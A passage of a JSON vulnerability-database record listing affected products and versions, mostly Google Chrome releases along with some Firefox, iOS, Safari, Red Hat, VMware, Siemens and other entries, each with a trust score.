        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.925.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.864.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.40"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.43"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.72"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.208"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.959.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.27"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.624.0"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.156"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.639.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.26"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1293.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.25"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.698.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1079.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.338"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.598.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.30"
      },
      {
        "model": "simatic ipc377e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.894.0"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.3"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1061"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.737.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.237"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.214"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1444.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1672.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.53"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "13.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.52"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.10"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "53.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.320"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.311"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.693.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.736.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1069.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.606.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.438.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.62"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.209"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.113"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201610"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1299.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.226"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.869.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.738.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.7"
      },
      {
        "model": "fx -8320 eight-core processor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "amd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.102"
      },
      {
        "model": "macos supplemental",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.13.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.231"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.18"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.54"
      },
      {
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.578.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.380.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.25"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.809.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.361.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1018"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.701.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.54"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.780.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.605.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1051.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.51"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.49"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.663.0"
      },
      {
        "model": "pyxis ciisafe -workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.537.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1275.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.133"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1046.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1062"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.934.0"
      },
      {
        "model": "simatic hmi basic panels 2nd generation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
